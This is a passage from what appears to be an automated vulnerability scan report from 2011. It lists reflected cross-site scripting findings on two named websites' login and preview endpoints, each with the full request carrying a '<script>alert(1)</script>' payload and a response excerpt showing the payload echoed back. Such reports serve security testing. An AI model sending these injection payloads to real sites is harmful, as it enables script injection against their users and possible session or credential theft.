GET /login_multiple/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000344)%3C/script%3Ed08e3"><script>alert(1)</script>82ebadbbe5e HTTP/1.1
Host: login.sisna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:57:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 2071
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<form action="/login_multiple/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000344)%3C/script%3Ed08e3"><script>alert(1)</script>82ebadbbe5e" method="post" name="login">
...[SNIP]...

4.22. http://login.sisna.com/login_multiple/ [RelayState parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.sisna.com
Path:   /login_multiple/

Issue detail

The value of the RelayState request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e0ea"><script>alert(1)</script>b83bede8fd2 was submitted in the RelayState parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login_multiple/?SAMLRequest=fZLNTsMwEITvSLxD5HuSpgWErCZVKUJU4ieigQM3x90mBmcdvE4Lb4%2BbUhUO9Gat1zPfrHc8%2BWx0sAZLymDKkmjAAkBplgqrlD0XN%2BElm2SnJ2MSjW75tHM1PsFHB%2BQC%2FxKJ9xcp6yxyI0gRR9EAcSf5Ynp%2Fx4fRgLfWOCONZsH8OmVthfBmymb1rkFUAAJVje9YVqJUAkpVSV1DXQELXvZYwy3WnKiDOZIT6HxpkCTh4CwcXhTJkI8u%2BfnolQX5j9OVwl2CY1jlron4bVHkYf64KHqBtVqCffDdKauMqTRE0jRb%2B1wQqbUvr4QmjzclAus84MwgdQ3YBdi1kvD8dJey2rmWeBxvNpvoIBOL2LOg2J0lsawfLO%2Bz2V8TPU4u9s4sO2iP419S2c%2BHbXPMr3OjlfwKplqbzcyCcD6Es53PcGNsI9z%2FbkmU9BW1DFd9K%2B%2BQWpBqpWDJgjjbuf7dDL8v3w%3D%3D&RelayState=https%3A%2F%2Fwww.google.com%2Fa%2Fsisna.com%2FServiceLogin%3Fservice%3Dmail%26passive%3Dtrue%26rm%3Dfalse%26continue%3Dhttp%253A%252F%252Fmail.google.com%252Fa%252Fsisna.com%252F%26bsv%3Dllya694le36z%26ltmpl%3Ddefault%26ltmplcache%3D28e0ea"><script>alert(1)</script>b83bede8fd2 HTTP/1.1
Host: login.sisna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:45:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 2785
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
Fsisna.com%2FServiceLogin%3Fservice%3Dmail%26passive%3Dtrue%26rm%3Dfalse%26continue%3Dhttp%253A%252F%252Fmail.google.com%252Fa%252Fsisna.com%252F%26bsv%3Dllya694le36z%26ltmpl%3Ddefault%26ltmplcache%3D28e0ea"><script>alert(1)</script>b83bede8fd2" method="post" name="login">
...[SNIP]...

4.23. http://login.sisna.com/login_multiple/ [SAMLRequest parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.sisna.com
Path:   /login_multiple/

Issue detail

The value of the SAMLRequest request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59ad7"><script>alert(1)</script>2c2eb30ca40 was submitted in the SAMLRequest parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login_multiple/?SAMLRequest=fZLNTsMwEITvSLxD5HuSpgWErCZVKUJU4ieigQM3x90mBmcdvE4Lb4%2BbUhUO9Gat1zPfrHc8%2BWx0sAZLymDKkmjAAkBplgqrlD0XN%2BElm2SnJ2MSjW75tHM1PsFHB%2BQC%2FxKJ9xcp6yxyI0gRR9EAcSf5Ynp%2Fx4fRgLfWOCONZsH8OmVthfBmymb1rkFUAAJVje9YVqJUAkpVSV1DXQELXvZYwy3WnKiDOZIT6HxpkCTh4CwcXhTJkI8u%2BfnolQX5j9OVwl2CY1jlron4bVHkYf64KHqBtVqCffDdKauMqTRE0jRb%2B1wQqbUvr4QmjzclAus84MwgdQ3YBdi1kvD8dJey2rmWeBxvNpvoIBOL2LOg2J0lsawfLO%2Bz2V8TPU4u9s4sO2iP419S2c%2BHbXPMr3OjlfwKplqbzcyCcD6Es53PcGNsI9z%2FbkmU9BW1DFd9K%2B%2BQWpBqpWDJgjjbuf7dDL8v3w%3D%3D59ad7"><script>alert(1)</script>2c2eb30ca40&RelayState=https%3A%2F%2Fwww.google.com%2Fa%2Fsisna.com%2FServiceLogin%3Fservice%3Dmail%26passive%3Dtrue%26rm%3Dfalse%26continue%3Dhttp%253A%252F%252Fmail.google.com%252Fa%252Fsisna.com%252F%26bsv%3Dllya694le36z%26ltmpl%3Ddefault%26ltmplcache%3D2 HTTP/1.1
Host: login.sisna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:45:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 2785
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
dKauMqTRE0jRb%2B1wQqbUvr4QmjzclAus84MwgdQ3YBdi1kvD8dJey2rmWeBxvNpvoIBOL2LOg2J0lsawfLO%2Bz2V8TPU4u9s4sO2iP419S2c%2BHbXPMr3OjlfwKplqbzcyCcD6Es53PcGNsI9z%2FbkmU9BW1DFd9K%2B%2BQWpBqpWDJgjjbuf7dDL8v3w%3D%3D59ad7"><script>alert(1)</script>2c2eb30ca40&RelayState=https%3A%2F%2Fwww.google.com%2Fa%2Fsisna.com%2FServiceLogin%3Fservice%3Dmail%26passive%3Dtrue%26rm%3Dfalse%26continue%3Dhttp%253A%252F%252Fmail.google.com%252Fa%252Fsisna.com%252F%26bsv%3Dl
...[SNIP]...

4.24. http://login.sisna.com/login_multiple/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.sisna.com
Path:   /login_multiple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7a2a"><script>alert(1)</script>13fcf75185c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login_multiple/?SAMLRequest=fZLNTsMwEITvSLxD5HuSpgWErCZVKUJU4ieigQM3x90mBmcdvE4Lb4%2BbUhUO9Gat1zPfrHc8%2BWx0sAZLymDKkmjAAkBplgqrlD0XN%2BElm2SnJ2MSjW75tHM1PsFHB%2BQC%2FxKJ9xcp6yxyI0gRR9EAcSf5Ynp%2Fx4fRgLfWOCONZsH8OmVthfBmymb1rkFUAAJVje9YVqJUAkpVSV1DXQELXvZYwy3WnKiDOZIT6HxpkCTh4CwcXhTJkI8u%2BfnolQX5j9OVwl2CY1jlron4bVHkYf64KHqBtVqCffDdKauMqTRE0jRb%2B1wQqbUvr4QmjzclAus84MwgdQ3YBdi1kvD8dJey2rmWeBxvNpvoIBOL2LOg2J0lsawfLO%2Bz2V8TPU4u9s4sO2iP419S2c%2BHbXPMr3OjlfwKplqbzcyCcD6Es53PcGNsI9z%2FbkmU9BW1DFd9K%2B%2BQWpBqpWDJgjjbuf7dDL8v3w%3D%3D&RelayState=https%3A%2F%2Fwww.google.com%2Fa%2Fsisna.com%2FServiceLogin%3Fservice%3Dmail%26passive%3Dtrue%26rm%3Dfalse%26continue%3Dhttp%253A%252F%252Fmail.google.com%252Fa%252Fsisna.com%252F%26bsv%3Dllya694le36z%26ltmpl%3Ddefault%26ltmplcache%3D2&b7a2a"><script>alert(1)</script>13fcf75185c=1 HTTP/1.1
Host: login.sisna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:45:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 2788
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
sisna.com%2FServiceLogin%3Fservice%3Dmail%26passive%3Dtrue%26rm%3Dfalse%26continue%3Dhttp%253A%252F%252Fmail.google.com%252Fa%252Fsisna.com%252F%26bsv%3Dllya694le36z%26ltmpl%3Ddefault%26ltmplcache%3D2&b7a2a"><script>alert(1)</script>13fcf75185c=1" method="post" name="login">
...[SNIP]...

4.25. http://shots.snap.com/rk.php [vid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shots.snap.com
Path:   /rk.php

Issue detail

The value of the vid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f363"><script>alert(1)</script>b45a55df056 was submitted in the vid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rk.php?url=http%3A%2F%2Fwww.mcafee.com%2Fus%2Fresources%2Fsolution-briefs%2Fsb-lizamoon-sql-injection.pdf&key=6e8afd4f63cdc7886a3f718aa78c7375&lang=en-us&th=silver&src=www.slaviks-blog.com&cp=Shotsense&s=small&svc=&tag=&atext=posted&title=Musings%20on%20Database%20Security&dfs=10&call=0&uid=16266132404ce087181f51bbd2d1a9b9&vid=89fdd0457a773fb9e78a2ee3e0b8ebd35f363"><script>alert(1)</script>b45a55df056&fl=null&size=320x79 HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:23:41 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 26 Apr 2011 01:23:41 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303781021; expires=Wed, 24-Apr-2013 01:23:41 GMT; path=/; domain=.snap.com
Set-Cookie: session=id%3D1b339d819ce287ba77eab1ba534cca22%26time%3D1303781021%26created_time%3D1303781021%26destination_url%3Dhttp%253A%252F%252Fshots.snap.com%252Frk.php%253Furl%253Dhttp%25253A%25252F%25252Fwww.mcafee.com%25252Fus%25252Fresources%25252Fsolution-briefs%25252Fsb-lizamoon-sql-injection.pdf%2526key%253D6e8afd4f63cdc7886a3f718aa78c7375%2526lang%253Den-us%2526th%253Dsilver%2526src%253Dwww.slaviks-blog.com%2526cp%253DShotsense%2526s%253Dsmall%2526svc%253D%2526tag%253D%2526atext%253Dposted%2526title%253DMusings%252520on%252520Database%252520Security%2526dfs%253D10%2526call%253D0%2526uid%253D16266132404ce087181f51bbd2d1a9b9%2526vid%253D89fdd0457a773fb9e78a2ee3e0b8ebd35f363%2522%253E%253Cscript%253Ealert%25281%2529%253C%252Fscript%253Eb45a55df056%2526fl%253Dnull%2526size%253D320x79%26referrer%3Dhttp%253A%252F%252Fwww.slaviks-blog.com%252F; path=/; domain=.snap.com
Set-Cookie: session=id%3D1b339d819ce287ba77eab1ba534cca22%26time%3D1303781021%26created_time%3D1303781021%26destination_url%3Dhttp%253A%252F%252Fshots.snap.com%252Frk.php%253Furl%253Dhttp%25253A%25252F%25252Fwww.mcafee.com%25252Fus%25252Fresources%25252Fsolution-briefs%25252Fsb-lizamoon-sql-injection.pdf%2526key%253D6e8afd4f63cdc7886a3f718aa78c7375%2526lang%253Den-us%2526th%253Dsilver%2526src%253Dwww.slaviks-blog.com%2526cp%253DShotsense%2526s%253Dsmall%2526svc%253D%2526tag%253D%2526atext%253Dposted%2526title%253DMusings%252520on%252520Database%252520Security%2526dfs%253D10%2526call%253D0%2526uid%253D16266132404ce087181f51bbd2d1a9b9%2526vid%253D89fdd0457a773fb9e78a2ee3e0b8ebd35f363%2522%253E%253Cscript%253Ealert%25281%2529%253C%252Fscript%253Eb45a55df056%2526fl%253Dnull%2526size%253D320x79%26referrer%3Dhttp%253A%252F%252Fwww.slaviks-blog.com%252F%26call%3D1; path=/; domain=.snap.com
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:23:40 GMT; path=/; domain=.snap.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 9898

<html>
<head>


<style>


body {
margin: 0;
padding: 0;
background: #f2f2f2 url('http://i.ixnp.com/images/hdr-spons.gif') no-repeat fixed 97% 94%;

border: 0;
}

#keywordTable {
fon
...[SNIP]...
<img src="http://direct.i.ixnp.com/images/ss_conf/89fdd0457a773fb9e78a2ee3e0b8ebd35f363"><script>alert(1)</script>b45a55df056/10.11.224:7781" width="1" height="1">
...[SNIP]...

4.26. http://shots.snap.com/shot/ [size parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shots.snap.com
Path:   /shot/

Issue detail

The value of the size request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e7ba"><script>alert(1)</script>d13f9b9ff8c was submitted in the size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shot/?url=http%3A%2F%2Fwww.mcafee.com%2Fus%2Fresources%2Fsolution-briefs%2Fsb-lizamoon-sql-injection.pdf&key=6e8afd4f63cdc7886a3f718aa78c7375&src=www.slaviks-blog.com&cp=&sb=1&v=6.59&size=small6e7ba"><script>alert(1)</script>d13f9b9ff8c&lang=en-us&search_type=spasense&vis=0&origin=shots_bubble&act=only_link&po=0&rp=null&tok=00034db816da48d6409a1a9cffc9091a0226f9839f&has_img=0&ol=0&ex=0&ad=unknown&ip=173.193.214.243&ua=Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+AppleWebKit%2F534.16+%28KHTML%2C+like+Gecko%29+Chrome%2F10.0.648.205+Safari%2F534.16&vid=89fdd0457a773fb9e78a2ee3e0b8ebd3&nl=0&referrer=http%3A%2F%2Fwww.slaviks-blog.com%2F&svc=&rt=1303780546551&w=320&h=207&target=_blank&tag=&goto=Go%20to%20%25URL&sc=1 HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:27:04 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:27:03 GMT; path=/; domain=.snap.com
Set-Cookie: spa=spauser%3D1%26spadomain%3Dwww.slaviks-blog.com; expires=Fri, 23-Apr-2021 01:27:04 GMT; path=/; domain=.snap.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 4635


<script>
function showGLOW() {
document.getElementById('snapshot_glow').style.display = '';
}
function hideGLOW() {
document.getElementById('snapshot_glow').style.display = 'none';
}

function
...[SNIP]...
m/preview.php?url=http%3A%2F%2Fwww.mcafee.com%2Fus%2Fresources%2Fsolution-briefs%2Fsb-lizamoon-sql-injection.pdf&key=6e8afd4f63cdc7886a3f718aa78c7375&src=www.slaviks-blog.com&cp=&sb=1&v=6.59&size=small6e7ba"><script>alert(1)</script>d13f9b9ff8c&lang=en-us&search_type=spasense&vis=0&origin=shots_bubble&act=only_link&po=0&rp=null&tok=00034db816da48d6409a1a9cffc9091a0226f9839f&has_img=0&ol=0&ex=0&ad=unknown&ip=173.193.214.243&ua=Mozilla%2F5.0+%
...[SNIP]...

4.27. http://shots.snap.com/shot/ [svc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shots.snap.com
Path:   /shot/

Issue detail

The value of the svc request parameter is copied into the HTML document as plain text between tags. The payload 20f2d<script>alert(1)</script>86efd429486 was submitted in the svc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shot/?url=http%3A%2F%2Fwww.mcafee.com%2Fus%2Fresources%2Fsolution-briefs%2Fsb-lizamoon-sql-injection.pdf&key=6e8afd4f63cdc7886a3f718aa78c7375&src=www.slaviks-blog.com&cp=&sb=1&v=6.59&size=small&lang=en-us&search_type=spasense&vis=0&origin=shots_bubble&act=only_link&po=0&rp=null&tok=00034db816da48d6409a1a9cffc9091a0226f9839f&has_img=0&ol=0&ex=0&ad=unknown&ip=173.193.214.243&ua=Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+AppleWebKit%2F534.16+%28KHTML%2C+like+Gecko%29+Chrome%2F10.0.648.205+Safari%2F534.16&vid=89fdd0457a773fb9e78a2ee3e0b8ebd3&nl=0&referrer=http%3A%2F%2Fwww.slaviks-blog.com%2F&svc=20f2d<script>alert(1)</script>86efd429486&rt=1303780546551&w=320&h=207&target=_blank&tag=&goto=Go%20to%20%25URL&sc=1 HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:37:39 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:37:38 GMT; path=/; domain=.snap.com
Set-Cookie: spa=spauser%3D1%26spadomain%3Dwww.slaviks-blog.com; expires=Fri, 23-Apr-2021 01:37:39 GMT; path=/; domain=.snap.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 2746

<html>
<head>
<title>Snap Shot - Error: Unknown Shot Type</title>
<link rel="stylesheet" href="http://i.ixnp.com/rsa/v6.59/rich-shot-common.css" type="text/css">
<link rel="stylesheet" href="http://i.
...[SNIP]...
<i>20f2d<script>alert(1)</script>86efd429486</i>
...[SNIP]...

4.28. http://shots.snap.com/shot/ [url parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://shots.snap.com
Path:   /shot/

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 44ce3<a%20b%3dc>b5cf3745f80 was submitted in the url parameter. This input was echoed as 44ce3<a b=c>b5cf3745f80 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /shot/?url=44ce3<a%20b%3dc>b5cf3745f80&key=6e8afd4f63cdc7886a3f718aa78c7375&src=www.slaviks-blog.com&cp=&sb=1&v=6.59&size=small&lang=en-us&search_type=spasense&vis=0&origin=shots_bubble&act=only_link&po=0&rp=null&tok=00034db816da48d6409a1a9cffc9091a0226f9839f&has_img=0&ol=0&ex=0&ad=unknown&ip=173.193.214.243&ua=Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+AppleWebKit%2F534.16+%28KHTML%2C+like+Gecko%29+Chrome%2F10.0.648.205+Safari%2F534.16&vid=89fdd0457a773fb9e78a2ee3e0b8ebd3&nl=0&referrer=http%3A%2F%2Fwww.slaviks-blog.com%2F&svc=&rt=1303780546551&w=320&h=207&target=_blank&tag=&goto=Go%20to%20%25URL&sc=1 HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:23:49 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:23:48 GMT; path=/; domain=.snap.com
Set-Cookie: spa=spauser%3D1%26spadomain%3Dwww.slaviks-blog.com; expires=Fri, 23-Apr-2021 01:23:49 GMT; path=/; domain=.snap.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 4058


<script>
function showGLOW() {
document.getElementById('snapshot_glow').style.display = '';
}
function hideGLOW() {
document.getElementById('snapshot_glow').style.display = 'none';
}

function
...[SNIP]...
<a b=c>b5cf3745f80">44ce3<a b=c>b5cf3745f80/</a>
...[SNIP]...

4.29. http://shots.snap.com/shot/ [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shots.snap.com
Path:   /shot/

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7832"><script>alert(1)</script>423eac9122e was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shot/?url=a7832"><script>alert(1)</script>423eac9122e&key=6e8afd4f63cdc7886a3f718aa78c7375&src=www.slaviks-blog.com&cp=&sb=1&v=6.59&size=small&lang=en-us&search_type=spasense&vis=0&origin=shots_bubble&act=only_link&po=0&rp=null&tok=00034db816da48d6409a1a9cffc9091a0226f9839f&has_img=0&ol=0&ex=0&ad=unknown&ip=173.193.214.243&ua=Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+AppleWebKit%2F534.16+%28KHTML%2C+like+Gecko%29+Chrome%2F10.0.648.205+Safari%2F534.16&vid=89fdd0457a773fb9e78a2ee3e0b8ebd3&nl=0&referrer=http%3A%2F%2Fwww.slaviks-blog.com%2F&svc=&rt=1303780546551&w=320&h=207&target=_blank&tag=&goto=Go%20to%20%25URL&sc=1 HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:23:40 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:23:39 GMT; path=/; domain=.snap.com
Set-Cookie: spa=spauser%3D1%26spadomain%3Dwww.slaviks-blog.com; expires=Fri, 23-Apr-2021 01:23:40 GMT; path=/; domain=.snap.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 4245


<script>
function showGLOW() {
document.getElementById('snapshot_glow').style.display = '';
}
function hideGLOW() {
document.getElementById('snapshot_glow').style.display = 'none';
}

function
...[SNIP]...
<a target=_parent style="border:0" href="a7832"><script>alert(1)</script>423eac9122e" title="Go to a7832">
...[SNIP]...

4.30. http://shots.snap.com/snap_shots.js [key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shots.snap.com
Path:   /snap_shots.js

Issue detail

The value of the key request parameter is copied into the HTML document as plain text between tags. The payload 87005<script>alert(1)</script>538521ad19a was submitted in the key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /snap_shots.js?ap=1&si=0&key=6e8afd4f63cdc7886a3f718aa78c737587005<script>alert(1)</script>538521ad19a&sb=0&link_icon=on&oi=0&cl=0&po=0&th=green&preview_trigger=icon&domain=www.slaviks-blog.com HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

